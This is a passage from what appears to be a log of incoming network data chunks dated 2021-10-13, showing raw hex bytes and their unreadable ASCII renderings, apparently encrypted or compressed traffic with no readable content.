fe 60 eb a9 ec 8f 94 fd ff 6d 3d 4d 28 cb 75 b4 d8 04 f8 63 57 2e b7 32 f6 8f aa 3d ee e8 44 Data Ascii: @yd4yaL0`iE[eyV};nzf:'u=KI$DVm?W=e>/u:%< .f5A*A'o&k%ZX~aw2&0t-`}CakLHFrW7]"AP79`m=M(ucW.2=D
2021-10-13 11:06:38 UTC	197	IN	Data Raw: 97 d3 46 fa f4 c6 ec 56 1a de c5 f3 66 bc 30 51 f5 45 bc 86 4c 8d 05 cd c8 56 bb f3 3d ff 3e b7 4d a8 4c 80 0d 69 74 13 58 49 98 68 fc a6 ad 22 27 da c6 d8 42 9b 71 ce 1d 4a 7a ba 29 42 c6 5c 5c 69 ad 81 11 17 5e f3 c0 4c 93 50 a3 96 35 ab 3c 4a 09 ae 91 91 77 af 68 84 c0 e9 55 47 4b e2 e4 74 b3 e7 c6 36 27 b4 d9 1a 24 86 1e ee 6b bb f2 e9 19 d6 50 f1 93 d3 36 7e 84 15 88 29 de 76 99 fd 5a c8 86 8c ec 83 a4 8d 44 43 b6 68 03 17 cd c9 a9 1b 63 30 c6 1a 79 54 49 bc 9e ce 96 d2 e6 0f 6c 3f f2 2c bf f5 b8 9d 23 f6 b7 ec 9f 39 43 6b 29 5f 01 e2 64 c3 7d 94 bd cb 4c 4d fb 55 56 f4 b9 a0 20 7a 0d a6 94 63 4c 44 22 2a d5 f3 93 5c d3 29 0d fe ff 46 7b f7 d8 16 80 00 e0 fc f5 6f bd fe 8b 91 fb 93 c9 cf 60 11 7c 70 2b a5 b1 93 d5 db 4f e0 ac df 90 9d ef e9 9b e4 55 Data Ascii: FVf0QELV=>MLitXIh"'BqJz)B\\i^LP5<JwhUGKt6'$kP6~)vZDChc0yTIl?,#9Ck)_d}LMUV zcLD"*\)F{o`\|p+OU
2021-10-13 11:06:38 UTC	198	IN	Data Raw: 8f 83 98 4f 81 4b ad e5 a2 c4 dd c3 dd 88 12 1f 66 9b 59 ac 58 a3 0b 46 04 dd f0 3f e7 c2 7c 9f 44 93 e5 48 3a c8 00 56 12 aa 6d dc 9b f3 aa 1c a1 e7 a6 b8 c8 69 ea fb 1e 76 ef 06 3d 0f 75 94 a6 0c 7c d5 20 05 50 cd ad d3 b9 8b 0e 21 14 d4 6b 79 5e 1d 22 ff b8 6a cc 5b 8b 84 d4 32 87 62 c0 2b 4c f1 a5 f2 12 6b 08 60 d0 02 5d 45 0d 3f 5c 2e 89 fb 57 1d 65 1b ec 82 b9 f3 fc 12 02 cd a1 04 0e ce 56 3f 7f e3 c0 58 7b 50 54 39 d6 32 d6 be be 33 5e 0c cf 96 96 2d ec 83 6a a2 4f d8 55 d6 9d 1d 5d ca d4 18 dd 88 ca 38 e6 c7 32 08 45 f2 fe 4f 4f 17 00 77 38 7a cb 38 82 e1 9d 4b 68 0d de d4 e9 b7 ff 15 49 e1 45 ad d6 30 f4 8b 11 7b d7 39 cb 26 33 8e b0 9c a6 47 0e 3f 22 38 8a 7c 30 e2 9e 51 9d f5 76 27 93 b6 56 1e b3 c3 83 cb f6 20 78 bd 75 94 72 bf 4b f2 c1 e8 13 Data Ascii: OKfYXF?\|DH:Vmiv=u\| P!ky^"j[2b+Lk`]E?\.WeV?X{PT923^-jOU]82EOOw8z8KhIE0{9&3G?"8\|0Qv'V xurK
2021-10-13 11:06:38 UTC	199	IN	Data Raw: c6 d7 45 32 58 4d 17 c1 e1 45 4b 2a 66 60 55 d3 6d e3 a5 ab 48 58 52 40 b7 88 d0 82 98 14 dc dc 87 97 18 e8 95 9a 1b 44 d9 0b 55 5b b6 b9 49 dd 51 38 08 f9 43 65 ef 71 37 08 f3 82 56 37 2c e1 74 9a 2e 52 f4 5e 47 c0 8d 2c 7a d5 e9 dc f3 5d ff f7 cd ce 56 07 c3 c2 e2 3d 8f 30 3f d6 5b b4 82 3f 81 18 da c8 50 aa e9 2f ee 10 a2 4b b6 49 88 0d 4a 61 09 5e 44 ca 5e f5 a9 b1 02 20 ca c7 d5 31 88 60 d9 0a 4a 6e aa 1c 54 bf 7a 5e 07 9e 83 10 17 5e f3 c0 29 a1 50 83 f9 05 bd 49 79 19 cb b1 a6 03 8b 78 e1 c3 f5 36 65 5f 96 c5 7f dd f3 e2 36 0c 8f d4 78 16 97 0f b9 50 b0 fa ef 0f e0 51 ef 9f c6 2b 6d 99 14 9f 3e cc 66 a4 d8 2e fb 91 91 de 84 bf 8b 21 60 a4 58 1b 33 e8 bb 94 0a 7f 1f e0 0b 6a 59 2b 9d 82 d9 f3 e1 f7 61 54 39 fe 2d fc f8 b1 ed 21 e6 de cf 92 31 2a 4c Data Ascii: E2XMEKf`UmHXR@DU[IQ8Ceq7V7,t.R^G,z]V=0?[?P/KIJa^D^ 1`JnTz^^)PIyx6e_6xPQ+m>f.!`X3jY+aT9-!1L
2021-10-13 11:06:38 UTC	201	IN	Data Raw: d1 19 84 84 9e 48 91 dc 47 d9 dd e4 76 bc fb fe 9c f2 2b 09 53 a2 42 74 98 86 34 37 e2 40 df f9 af 53 16 00 58 c0 b9 57 a5 5d 6e 82 7b 94 38 e9 ff d5 5e b0 c0 49 39 46 db 47 1d be 70 2d 12 ff d2 a9 db a7 bc f4 10 20 06 14 aa 82 6c b9 9e b4 73 a6 46 b3 e9 cc c4 ed d9 eb c6 26 00 6a 9b 68 a3 2c bf 2f 27 2d d2 f0 1d e8 b6 65 b3 2d b8 ea 06 13 cf 65 37 0b cf 7b e9 dd f9 ac 79 8b ec cb b8 a2 2e e9 e5 4c 70 eb 62 10 09 33 be a1 69 76 df 4d 25 3b 8a 8e cc ed a9 08 51 1a d6 07 7d 7b 7c 2d f1 b8 6c da 56 a3 8e fb 36 a5 6f cf 2f 2f ee dc e5 12 51 36 4e d4 72 49 6c 16 03 78 7d 9b fc 5a 1f 58 1c ee 95 d4 d2 f0 08 3c e7 96 04 0d e3 5c 52 4e 91 c6 53 7c 69 4b 39 d4 06 d3 b5 b8 2a 10 09 c9 f3 f1 3b fd a8 76 b3 53 e4 46 da 92 78 49 ef b5 12 d3 88 ca 38 e6 c7 0c 19 4f eb Data Ascii: HGv+SBt47@SXW]n{8^I9FGp- lsF&jh,/'-e-e7{y.Lpb3ivM%;Q}{\|-lV6o//Q6NrIlx}ZX<\RNS\|iK9*;vSFxI8O
2021-10-13 11:06:38 UTC	202	IN	Data Raw: 31 d9 7a 0f de 79 bb 28 86 6d 8c f5 83 51 9e 3d d9 39 1a 76 d6 f2 58 41 b0 d7 b3 2f 05 5d fc 5a 37 8c 84 36 85 cc e5 da d9 4b 81 60 f5 9d f5 e6 db d0 ec 49 1f aa 96 b5 b9 fd c3 51 2e c3 7f 05 3b b1 ef 9b b5 73 a8 96 70 66 ce 3a b0 d4 ce 44 35 47 41 36 ce 8c 63 65 30 64 77 4e c2 71 f8 ae ab 5f 44 47 55 a7 89 8a 9d b6 56 ea d6 ab 93 1e ff 8f 8b 07 5f d2 0b 76 5b a0 93 6f ca 44 26 29 f3 46 75 e3 70 18 7c e0 95 4b 0a 15 fa 72 fb 17 42 dc 42 28 e6 84 1c 61 dc e8 f0 fe 4f f9 ea ce ee 56 1a de c5 80 2c 9e 26 4b f9 59 b4 91 25 af 02 ae dd 5c bc c3 1a e8 73 8e 51 b5 4d a2 0e 45 73 09 56 5f ea 5a ed a1 a6 0d 54 d0 cd cf 1d 88 77 ce 17 56 62 ab 2b 5e d1 54 56 0e 8f 9d 14 33 45 f3 cd 4c b5 46 b4 c9 35 a6 52 6d 04 c0 b2 b4 14 89 63 f1 e8 f9 16 6f 41 84 c5 77 c6 f2 c2 Data Ascii: 1zy(mQ=9vXA/]Z76K`IQ.;spf:D5GA6ce0dwNq_DGUV_v[oD&)Fup\|KrBB(aOV,&KY%\sQMEsV_ZTwVb+^TV3ELF5RmcoAw
2021-10-13 11:06:38 UTC	203	IN	Data Raw: 56 8e 8e 27 e7 1a ce 3b a3 c0 22 62 b3 85 08 1f 1b d1 b4 eb 5a 37 fe 54 31 d5 9f ec ba 71 a2 f3 24 3b 59 d7 e2 3a 42 cb 6f 33 ad ab 0e 44 4c a4 93 fe de 76 79 5a 97 f0 4c 63 96 98 ee a3 ba db 2c 86 a0 0f 0a e4 c5 e1 50 7b 94 10 42 c7 6d a8 f5 db 63 84 af 56 c1 a9 cb 07 ef c7 ee ee e7 29 5e 58 a7 2a 17 8e e3 24 19 af 4a c0 8d a1 22 54 0e 29 83 92 25 e1 77 1c c7 56 e6 7e c5 8d 92 71 c2 88 67 4b 27 fa 35 7f b0 15 3a 24 a6 d3 a1 a9 c2 96 98 13 28 74 73 97 ed 7f a5 8d 92 1c b1 5b b3 e5 c1 d7 d7 c5 fb 95 16 02 62 e9 4b bd 43 8e 06 4f 08 ca f0 3f e7 c2 7c b8 5b 9e f4 67 29 a5 16 33 15 90 78 f5 bc ee a7 0b ef e4 b9 dd ab 5c 8f eb 3e 17 c2 07 20 62 60 89 b8 0c 53 d9 1f 05 31 ee ad d5 ed ac 0a 3f 33 cf 7e 4e 75 1d 2b ff ca 2d fa 67 8c dc fb 25 b0 73 d9 21 1f e0 ae Data Ascii: V';"bZ7T1q$;Y:Bo3DLvyZLc,P{BmcV)^X*$J"T)%wV~qgK'5:$(ts[bKCO?\|[g)3x\> b`S1?3~Nu+-g%s!
2021-10-13 11:06:38 UTC	205	IN	Data Raw: a8 e8 92 c7 66 08 aa 43 38 96 b7 26 50 ae cb f8 52 6c 2e b9 e8 82 3c f9 cc df 4e fd 87 ee 1a dd 7d 82 26 26 c6 14 c4 80 43 82 d5 bd 10 6a fe 5b 9d a6 c6 ea 80 b4 ac 56 04 39 0e ec 5b a2 e7 6a c9 40 3a 0d d3 7b df b1 cf 07 cb 98 76 3d cc 65 08 bd 56 a7 41 a5 04 88 e2 98 7d be 08 fb 72 3e 6c cc e8 57 2d 95 d3 b4 19 30 16 cd 46 33 93 83 5a 93 db c2 e0 fd 58 9a 70 f9 81 9b b5 f0 d7 f4 6b 17 f0 92 a5 a5 fa c3 53 25 ed 5b 0f 22 9e f0 92 a2 72 92 9c 6c 10 d4 3c a1 f8 b8 6c 2e 57 5a 36 d3 e3 46 7e 70 44 7b 4f c4 79 fb 82 ca 7f 54 57 0f 8f 9d f7 b1 8b 0e c0 da a3 90 6c dd 99 8c 27 5e cf 7f 70 50 b7 a9 5d ba 53 2f 34 cf 64 69 e3 73 12 32 e8 94 5a 26 59 d8 70 ee 00 43 d6 5f 28 f2 98 1b 51 d0 f7 dc f3 5d f9 ea ca ea 51 73 d6 ce f4 17 ab 27 50 e0 52 a7 91 25 a5 1f ae Data Ascii: fC8&PRl.<N}&&Cj[V9[j@:{v=eVA}r>lW-0F3ZXpkS%["rl<l.WZ6F~pD{OyTWl'^pP]S/4dis2Z&YpC_(Q]Qs'PR%
2021-10-13 11:06:38 UTC	206	IN	Data Raw: 13 7b 60 dd 60 de 79 87 ab af 3f 7a e6 60 4b f9 bf ab 2d 43 19 ba 90 54 5b 45 51 28 c4 f4 cc 77 d7 2e 26 c7 f5 4f 62 fd d0 07 81 50 e1 fc f2 55 85 ec f8 96 d3 88 f2 d2 63 15 69 78 4a a2 b1 b7 f8 fb 52 e4 ba c0 f5 af 8e fb 92 e4 4f 70 94 8c 42 e6 1e ce 01 b6 e9 38 61 c7 ac 6d 0a 11 a5 a9 da 2e 00 ef 37 1d c8 fa c7 be 02 e4 f0 41 08 76 96 d8 2d 37 e4 63 29 b4 b9 7e 23 4b a0 cc d8 d6 1f 6e 5e e4 a3 41 74 81 89 97 b6 ca bc 2e 82 ff 03 1d f2 c3 91 23 5c 91 4f 4a d3 14 9f 84 99 52 f5 ec 64 b0 ed f8 76 aa fb 9f a8 f2 58 19 4e d6 62 00 ff a0 2f 06 cc 4e c5 8d 86 23 24 0c 36 e7 96 38 93 59 0f b3 12 dd 13 e1 98 f7 71 df fa 4d 58 53 b2 20 1a a3 2f 00 0e 92 d4 a5 a9 84 ba 86 1b 28 72 73 a1 f6 3c 9e 99 82 68 87 53 a2 f4 a2 e2 dc d3 cd a4 19 17 60 ef 2a 88 42 98 0a 45 Data Ascii: {``y?z`K-CT[EQ(w.&ObPUcixJROpB8am.7Av-7c)~#Kn^At.#\OJRdvXNb/N#$68YqMXS /(rs<hS`*BE
2021-10-13 11:06:38 UTC	207	IN	Data Raw: c4 2e 6f 1d 76 61 13 6b ec 19 f1 d7 96 76 7d 05 d6 fa da b7 f3 3e 0a dc 4d bc c7 05 fd 95 0b 7f c2 28 cb 00 26 8a 8a a2 b0 69 01 36 05 2e bc 69 5d d0 ec 5f 8c e4 68 1b 8d 8d 57 13 a4 b7 aa cf ef 1a 31 b4 7e 85 5f 8a 4d e9 da 9d 3a e3 dd b6 d2 72 15 c9 65 29 8b 8f 21 6d af d6 f9 6f 6a 33 be e8 82 31 f8 dd db 4e ba bb fc 37 c6 7a 9b 26 70 f7 6c d4 91 41 93 dd bf 17 57 fc 6a 84 a1 d1 ea 8b c0 ff 4c 18 23 1f e4 0d 84 92 46 c8 29 14 1d fd 76 c4 c5 ef 00 a4 ae 50 58 f9 66 61 96 46 d4 20 9d 6d 89 e5 f7 6d a4 6e eb 29 68 60 ca 9d 50 34 d7 d5 b2 70 11 4e 8e 6a 28 e3 ae 40 f6 ec e7 85 c9 58 f3 54 ea f2 d3 90 89 c5 f6 0e 18 a8 c0 b3 bd 8e ce 48 40 a6 6e 60 29 98 99 99 b1 00 83 8e 1e 25 ca 5f 80 fc b8 64 30 34 6e 2e a0 cb 57 0a 16 65 12 5d c6 18 f5 b7 ab 6f 4a 34 45 Data Ascii: .ovakv}>M(&i6.i]_hW1~_M:re)!moj31N7z&plAWjL#F)vPXfaF mmn)h`P4pNj(@XTH@n`)%_d04n.We]oJ4E
2021-10-13 11:06:38 UTC	208	IN	Data Raw: ad 34 fd b5 ad 19 bf 3c a0 36 35 1f 8e de bd 67 fc e7 67 58 14 f5 5a eb 4d a8 25 d1 98 4b 82 eb f9 bc f0 cb ee 21 30 c5 2f 5a 5c a8 c7 e8 73 07 5e 9e 32 61 64 2c 85 86 d0 92 c7 e7 07 11 64 bd 78 91 a7 f2 ad 40 92 b3 ac fb 5d 43 3f 67 0b 22 b7 04 bf 10 f4 de ba 5e 07 93 2d 30 97 de d0 5e 2f 6d da d4 03 2f 35 30 55 b1 95 d8 16 a7 48 61 b2 82 2e 14 84 a3 6b e5 12 9b 9f 94 22 e9 9e ea c4 b0 e9 bf be 07 6a 0d 17 2b d6 d5 e2 8d 9c 33 8d c6 b7 d5 f9 fc 8e fa 90 0a 0c ed e4 20 96 6d b2 6c e4 88 4d 1f bb da 6a 6f 66 f0 fe 9f 5a 74 9c 75 70 a2 9d bb de 79 e0 83 24 6e 3d d3 a2 4a 50 85 02 67 c1 cb 70 54 2f d4 98 d0 d7 58 5e 45 fa d3 55 72 96 9a ee c5 ce d3 4b e4 a8 5b 79 8b be dc 29 17 a4 60 71 da 04 8f e5 af 4f 9a c1 10 b0 ad 84 76 fd ae 93 ef 86 5f 13 43 f8 7f 07 Data Ascii: 4<65ggXZM%K!0/Z\s^2ad,dx@]C?g"^-0^/m/50UHa.k"j+3 mlMjofZtupy$n=JPgpT/X^EUrK[y)`qOv_C
2021-10-13 11:06:38 UTC	210	IN	Data Raw: 93 f6 70 78 8c ec 13 bb 79 68 e1 2a 60 c1 8b 1b 71 39 fb dc e2 99 94 88 e7 08 8e f4 6a 63 88 3f 56 1c f1 26 7c 0a 0f 24 59 38 69 b8 fa d9 40 02 ec e3 f9 90 7e 89 ea 27 53 78 bf 23 be eb f9 12 96 34 14 b4 a8 ae 5c 83 19 3e 6a a1 d9 a1 af 73 7e 20 07 5c 1c 14 b8 e3 05 ca 17 88 29 bf f4 8f d3 81 4d 0a 8c 29 c1 b1 c5 f4 ff 4f 1b bb 54 d5 41 52 f0 ee dd f4 2b 6d 5a 59 40 c3 1b 53 89 90 34 e9 00 10 6a ef df 32 69 d1 ab dd a8 9f 45 79 db 0c e5 2d de 3a 10 db 98 5d 87 b4 e7 b9 00 66 cc 2c 42 ee 59 71 1e c5 Data Ascii: pxyh*`q9jc?V&\|$Y8i@~'Sx#4\>js~ \)M)OTAR+mZY@S4j2iEy-:]f,BYq
2021-10-13 11:06:38 UTC	210	IN	Data Raw: b1 8b 1b 0f 59 4b e9 d4 45 88 a4 a6 3f d7 d5 9a 7a b5 10 e8 42 1a ea 6f a0 e4 3d f2 9c d3 7c 37 89 2e e2 d3 b7 0e 72 a8 ed 46 6b 50 77 9c 69 ed 90 19 a1 39 57 6f e1 2e a3 f0 a4 68 b8 f5 2b 45 ac 26 7c dc 37 d4 40 e2 71 fa 90 ff 12 cd 7c ba 52 75 19 a2 93 2b 53 e2 af c5 72 43 38 86 28 42 f1 df 38 eb b5 8c 8b 92 3c c6 11 9e f8 9c e5 9b 25 01 1c fa 0b d2 b9 cd 8e a8 3f 5d c6 16 79 48 e2 85 e2 d2 12 40 74 1f 78 bd 43 d8 97 a5 3d 5a 28 35 45 bd 8e 3e 0a 56 15 07 2e 30 95 96 de ab 09 1d 35 32 c2 ec a2 f4 fb 79 a1 aa c6 eb 6c 99 e0 e4 73 2c a1 05 17 3e d7 d0 32 a6 36 4e 40 91 25 1d 8c 0f 77 7d 99 f0 23 52 4c 87 90 0b 62 35 b3 2a 28 b6 ff 73 09 bb 94 a9 91 28 83 8a 22 02 23 6d b1 be 92 c9 76 54 21 90 b7 75 e2 0f ce 79 bc 3b a0 c9 89 49 0a 54 e2 2a d5 3b ef 6f 37 Data Ascii: YKE?zBo=\|7.rFkPwi9Wo.h+E&\|7@q\|Ru+SrC8(B8<%?]yH@txC=Z(5E>V.052yls,>26N@%w}#RLb5(s("#mvT!uy;IT;o7
2021-10-13 11:06:38 UTC	211	IN	Data Raw: 39 81 5a f4 49 17 6c da 77 31 21 00 21 50 b5 9a c9 18 ba 56 79 b7 8d 27 0f 94 ac 76 ec 11 11 a8 85 33 97 9f f8 e1 b5 fc ad a6 0f 7f 1c 09 2e cb d1 ef 82 96 24 81 cc b6 fb f1 ea 8e ff 8d 0f 10 e6 e6 24 85 ff 26 66 e8 95 4a 03 ae da 70 68 69 d4 eb 9e 54 68 92 49 70 b7 1d bc d8 f3 f5 9e 27 61 35 ca b6 57 40 8b 00 44 c5 ea 7f 4a 33 d7 91 80 ab 70 1d 28 8b bf 32 33 f5 e8 ec d8 cf d5 45 f1 a7 4b 65 8e ad 94 58 31 e5 12 1c b3 70 e9 99 de 7e f2 85 05 a2 2b 85 74 e1 81 8a fc 04 51 5c 34 d8 22 7c e2 e6 5d 6d a1 32 b4 85 cf 4e 51 75 44 91 52 76 e9 29 6b da 17 89 7b 88 f7 8f 32 a2 0a 35 24 22 bc 5a 7a c5 f2 43 69 7d bb dd de df d0 e9 73 54 03 7d cd 9f 39 df 6e fd 01 f0 2f c4 9d a7 b1 3a a2 9f c3 7d 60 6a 9c 0a cb 2d ef 45 34 68 b5 f0 5a 97 a4 a1 d0 2f f1 8e 1b 5e b8 Data Ascii: 9ZIlw1!!PVy'v3.$$&fJphiThIp'a5W@DJ3p(23EKeX1p~+tQ\4"\|]m2NQuDRv)k{25$"ZzCi}sT}9n/:}`j-E4hZ/^
2021-10-13 11:06:38 UTC	212	IN	Data Raw: 03 75 a9 56 87 d0 85 44 04 80 26 c0 ad 4a 9f ec 4e 98 0b 5e c5 4f 5e e7 e1 c7 f4 28 78 48 d3 e6 c6 0e 5d 94 9f 31 ed 93 ab da e3 d7 3c 60 f0 b7 d8 bb 19 f4 7a c9 10 f3 2c d9 3d 80 2c 2c 7f 88 a7 ea b0 08 73 48 17 5e 7f 3c 52 04 c1 b7 9b 29 8d 42 c8 e6 df 4b 84 a5 b4 2d dd c0 8a f6 18 16 e1 4d 00 9e 62 ae e2 36 f8 b2 dc 6c 50 86 27 ed cf a6 8e fd ba f1 3d 70 48 7e 93 f4 69 93 0a a0 27 45 ea 48 20 d8 d7 2b d4 a2 c8 24 4a 3c aa 6f db 13 d4 53 6a d0 ed b0 f6 1c 53 af 87 59 68 04 a2 93 38 4e d0 b4 d2 62 d2 a1 8f 27 43 ed e4 3e eb a7 99 a8 88 3e e6 01 1d 6b 9a f4 08 e4 95 1c fb 47 c1 de de 9c 2b a7 41 d1 99 20 41 e0 97 ec 47 a0 cf eb 77 6e a0 5a d6 0a f8 33 2e 3c 35 57 a8 86 20 09 4f 90 db 20 a0 9a 5a dc ae 2c 3d 26 a1 53 e9 a4 d7 ec 6a 28 20 c7 f1 ed da f2 f6 Data Ascii: uVD&JN^O^(xH]1<`z,=,,sH^<R)BK-Mb6lP'=pH~i'EH +$J<oSjSYh8Nb'C>>kG+A AGwnZ3.<5W O Z,=&Sj(
2021-10-13 11:06:38 UTC	214	IN	Data Raw: 91 39 8a e3 a3 d1 2b f4 74 f9 cd ed 01 f0 99 49 8e f7 ff b6 ff d6 eb 3d 22 47 0b 66 4c c0 d4 e3 76 1a 43 88 62 1a 39 69 ea e4 3e c6 ae 87 12 25 5c 94 4e a2 92 c0 80 5c 8f ab b0 f9 55 4d 38 67 1f 2c bd 30 a3 01 ef c5 a1 51 0d a7 39 18 92 d9 cb 51 32 65 c8 f1 19 2c 2e 3f 48 b8 8f f8 17 aa 4f 6b 32 09 23 00 10 f1 66 f6 81 0a 98 93 b1 b1 91 e4 eb b8 f4 b0 a3 08 6a 98 14 37 de c9 e9 96 82 3d 93 4f f3 e7 90 e7 93 fd 8d 16 03 fd fc 3b 89 7d bd 64 e2 9a cf b4 bd d1 45 6a 65 c4 e4 1a c3 75 9c d5 35 b0 8d 28 53 70 f6 02 64 74 35 d9 b6 44 4c 9b 84 42 ce d8 ff 04 26 dc 81 f4 bc f7 bc 22 9f a8 20 00 fd e6 e0 cb c2 d3 5a 74 ed 40 78 88 b8 9f 5e 28 67 5d 07 b6 6e e2 8a d3 2e f1 af 11 b3 a1 88 76 ee 81 9c e6 86 5c 5f 2a d8 22 7c f1 eb 47 6e a7 21 bf 85 cf 5b 43 6e 53 96 Data Ascii: 9+tI="GfLvCb9i>%\N\UM8g,0Q9Q2e,.?HOk2#fj7=O;}dEjeu5(Spdt5DLB&" Zt@x^(g]n.v\_*"\|Gn![CnS
2021-10-13 11:06:38 UTC	215	IN	Data Raw: 0d 0e 6e 2c 6e 8f e9 a4 9c 84 6e 40 83 c9 60 7f 88 3f 5a 12 fe af 35 12 07 2c 43 ab 2d b7 d2 d3 5c 18 68 a2 f1 94 50 87 de 32 c0 28 a5 a2 26 f8 6a ae c4 bb 7b ad 9a 2c c4 93 8a e6 3b 2e 8e be 33 2c 7a 1d 01 55 13 91 70 f4 8c fd 84 49 72 d2 dc 86 d8 8c 42 04 80 26 d3 ab 4a 99 f1 44 1d b6 40 d9 c3 63 f4 f2 c9 c9 2d 70 5f 43 c9 41 00 58 9a 9b 24 7a 9c 34 72 f3 b0 35 6b d2 ab d0 af 86 40 69 dd 18 ee 25 c3 2b 83 2c 1c 73 9b ac f0 34 33 73 a0 27 6c ff ca cb 3a c1 99 8b 33 12 4e c2 e0 cc 46 82 bd 9a 22 d2 c8 98 70 ae 16 f3 4b 0c 83 6d bb eb 1c f1 b6 c7 6c b8 02 28 f9 4e e5 9d 97 ba ea 3d f6 d4 6a 93 f4 b0 9c 0a af a8 17 66 e8 23 33 74 a8 7b b1 fa a7 51 bc 1d 6f cb 22 56 f0 ea 63 e5 99 f0 0b df 7c 0e c1 60 0d b7 9b 16 40 c5 33 5a 73 59 3f 88 21 43 e6 f7 33 f8 a1 Data Ascii: n,nn@`?Z5,C-\hP2(&j{,;.3,zUpIrB&JD@c-p_CAX$z4r5k@i%+,s43s'l:3NF"pKml(N=jf#3t{Qo"Vc\|`@3ZsY?!C3
2021-10-13 11:06:38 UTC	216	IN	Data Raw: 13 71 b1 b2 9c 3e 99 c8 c9 67 52 a3 a8 bb 46 ce 14 ad 78 27 e3 dc 68 31 bb 34 2e e9 66 eb 35 47 2c 9c a7 4c d0 23 c0 92 77 cb 3c 09 69 ae c5 f5 77 ee 03 84 86 8d 51 f0 2f e2 ac 14 b3 8f a3 42 7c fd 4d 1a 63 e1 6c be 00 d3 9d 83 68 9f 29 03 5a b7 54 33 e7 fa 43 4a aa 01 d8 91 52 87 e7 d8 bd f9 c3 e3 26 3a c7 20 72 56 b5 d4 e3 63 0e 56 9c 7a 38 32 43 e0 fe b8 d3 b2 80 05 27 57 96 43 b4 9f d4 95 45 b2 b5 a6 f3 55 56 3f 71 15 37 a7 18 a7 14 f9 c4 a5 50 17 95 2e bb 11 d0 cd 44 3f 68 e8 f4 05 22 29 22 4f b8 96 4f 91 a3 d9 f8 b8 90 20 03 12 30 62 67 81 82 1a 00 36 f1 9e f0 f4 35 7d a9 a0 17 fb 98 12 2b d7 df f6 09 1f 2a 81 cc a1 77 fc fd 0c fb 82 88 1b e5 fc 36 14 d3 bc 64 e1 8f 5c 8e 32 db 6d 6c 7f cd ef 9c 4e 76 85 48 7d ad 82 b8 4a d5 ec 9f 2e 60 23 dd b6 42 Data Ascii: q>gRFx'h14.f5G,L#w<iwQ/B\|Mclh)ZT3CJR&: rVcVz82C'WCEUV?q7P.D?h")"OO 0bg65}+*w6d\2mlNvH}J.`#B
2021-10-13 11:06:38 UTC	217	IN	Data Raw: 6a 51 64 de 99 7a cf 1a 22 6b 6f 53 d9 5d 2c 26 86 8f 4e 05 01 86 5c 73 b3 04 c2 6e 30 a6 cd 84 42 0a 2c ab ed ed 71 d1 b6 af 87 c9 01 fc b6 98 b0 2a ab 3d 4d 01 aa d7 38 08 8d 4a 5e 05 30 93 f7 cd 67 03 bb 04 3d 22 6b e0 ff 75 df ae 3e 63 ab 96 90 67 51 9a 8b e6 88 9a 55 51 6c 88 30 50 08 63 4b 2f 8f e3 36 4c b5 59 b1 d4 d3 4f 0d 63 ac fd 95 56 94 f9 3d cf 33 be 03 bb f8 69 af 6c bb 7b b6 80 aa 5b 9b 91 6f 71 28 88 98 29 30 7a 15 16 dc 97 95 7f 71 68 fa 17 88 f9 ba c6 0e 3e 8c 40 03 9c a9 a8 a1 43 96 f3 56 13 bd 55 da c0 6f f3 fd 4c 38 2e 6d 58 56 56 c1 15 57 a7 9e 23 ea 00 b0 76 f3 59 de 67 d7 b0 cf a4 99 59 65 c6 0d fc 30 dc 2f 91 ac 9c 73 97 28 db b0 2a 63 cb 30 cc 13 d6 41 23 c9 bb 9c bb e3 59 4a 3d dd 42 8c a5 bf 29 d1 c7 1b a1 b4 11 e7 44 28 81 66 Data Ascii: jQdz"koS],&N\sn0B,q=M8J^0g="ku>cgQUQl0PcK/6LYOcV=3il{[oq()0zqh>@CVUoL8.mXVVW#vYgYe0/s(c0A#YJ=B)D(f
2021-10-13 11:06:38 UTC	219	IN	Data Raw: f7 31 ae 8a 19 35 f4 cd 2f af 26 cb d9 91 35 80 82 3c 71 73 95 71 a2 5b 4b 14 8c 9f 66 2e a1 ad 20 a4 7c 6b 1d a4 80 b1 8d 2c 9e 85 a6 9a 33 f2 14 aa 92 c9 f3 52 1f 92 25 54 78 42 dc 6b 8e b8 2b 49 01 53 83 18 f4 35 5a 9c e0 73 aa 1d 65 19 2a 89 ba 9d c2 e1 63 41 b1 29 22 43 db 95 a5 7c 25 1e 5d 55 3a 9f 36 3e 7b 78 d2 68 42 31 99 ab 46 d5 25 c8 8b 72 d2 39 01 65 a6 d6 ff 76 e2 06 94 87 8f 4b 00 3f fc ac 0e b3 86 83 40 65 f8 b5 14 6f 90 6a d1 02 b4 96 b3 6e b3 38 b1 f6 a4 55 20 eb 7f f6 49 b1 19 d8 91 47 93 fe e4 a1 f3 c3 e6 3d 2d d9 22 7e 5e a8 cc fa 6e 26 5f 89 7a 1a 20 4e e0 ea a1 f6 ae 9e 12 3c 4d 8f 55 a3 8a d9 95 44 94 a5 29 fa 58 43 38 73 9a 31 a9 02 af 01 f6 ca c6 46 3f 91 22 3d 8d dd d8 49 2a 69 c2 f2 02 34 25 3f 48 be 8f c4 18 b8 5a 7a b6 9e 33 Data Ascii: 15/&5<qsq[Kf. \|k,3R%TxBk+IS5ZsecA)"C\|%]U:6>{xhB1F%r9evK?@eojn8U IG=-"~^n&_z N<MUD)XC8s1F?"=Ii4%?HZz3
2021-10-13 11:06:38 UTC	220	IN	Data Raw: d0 57 e1 34 6e c7 12 94 7e 80 ff 92 37 b0 88 20 39 27 b2 47 7f d7 70 4e 7b ff b6 c0 db c2 d5 f4 76 49 06 73 c3 82 3c cd ec e0 1c f5 32 c1 80 a2 a3 b8 b7 82 c6 73 72 03 9b 2a c9 2c fc 45 27 69 b8 f0 58 82 b6 23 d9 2d ff 80 06 5b a5 65 56 61 cf 19 83 dd 9a c6 79 ef 86 cb dd c8 2e 8f 8f 4c 17 81 62 52 60 33 ed ca 69 32 94 4d 60 d0 92 c8 a7 ed d6 63 51 d2 bd 07 1c 10 7c 4f 9a b8 2d a9 2f cd ed b8 56 c9 02 ad 4e 4c d5 dc 82 f7 25 69 0d b5 02 3a 20 79 60 13 7d cf 8e 3b 70 2b 7b 81 e7 b9 fc 99 66 dd 8b d4 68 62 80 37 52 1a e3 a7 3d 0f 0f 24 4a b9 44 bf da db c1 10 6d a2 f3 96 5e 89 f7 35 d2 3d b7 23 bf f9 78 2f 85 b5 75 b8 88 ad cd 92 98 67 db a0 83 b0 9a 20 72 00 04 5d 0e 94 6d f1 84 ef 5d 8a 63 bb 3e 8f d2 8b 4a 0a 8e 28 dd a3 44 91 4d 5d 2e ba 5c cb 17 56 a9 Data Ascii: W4n~7 9'GpN{vIs<2sr*,E'iX#-[eVay.LbR`3i2M`cQ\|O-/VNL%i: y`};p+{fhb7R=$JDm^5=#x/ug r]m]c>J(DM].\V
